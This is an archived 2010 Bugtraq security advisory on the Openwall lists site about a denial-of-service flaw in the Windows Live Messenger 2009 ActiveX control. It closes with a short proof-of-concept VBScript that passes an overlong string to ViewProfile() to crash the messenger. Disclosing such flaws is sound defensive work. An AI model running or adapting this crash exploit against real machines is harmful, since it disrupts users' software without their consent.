lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Fri, 8 Jan 2010 02:52:59 -0700
From: advisory@...kattack.com
To: bugtraq@...urityfocus.com
Subject: [HACKATTACK Advisory 080110] Windows Live Messenger 2009 ActiveX
 DoS Vulnerability

Product:
Windows Live Messenger 2009 (Build 14.0.8089.726)


********************************************************************************
Vulnerability:
ActiveX - Denial of Service


********************************************************************************
Discussion:
Vulnerability is in Activex Control(msgsc.14.0.8089.726.dll) 
Sending a string to ViewProfile() , cause a crash on msnmsgr.exe
*must be signed in Msn Messenger account for triggerin the vulnerability.



********************************************************************************
Vulnerable:
Windows Live Messenger 2009 on Windows Vista
Windows Live Messenger 2009 on Windows 7

Not Vulnerable:
Windows Live Messenger 2009 on Windows XP

Credits:
HACKATTACK IT SECURITY GmbH
Penetration Testing in Deutschland - Österreich - Schweiz
www.hackattack.com

and

Natal Networks Inc.
Vulnerability Discovery, Penetration Testing, IT Security Consulting
www.natalnetworks.com


********************************************************************************

Original Advisory
www.hackattack.com
www.natalnetworks.com


********************************************************************************
PoC .wsf script:
'works on vista and windows7

<package>

<job id='DoneInVBS' debug='false' error='true'>

<object classid='clsid:B69003B3-C55E-4B48-836C-BC5946FC3B28' id='target' />

<script language='vbscript'>

arg1=("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")

target.ViewProfile arg1 

</script>

</job>

</package>



About HACKATTACK and Natal Networks
================
HACKATTACK IT SECURITY GmbH is a Penetrationtest and Security Auditing company located in Germany and Austria
More Information about HACKATTACK at
http://www.hackattack.com

Natal Networks was founded by Hellcode Research Team in 2009.
Main mission of Natal Network is discover and research vulnerabilities.
Providing penetration tests and security auditing services.
More about; www.natalnetworks.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ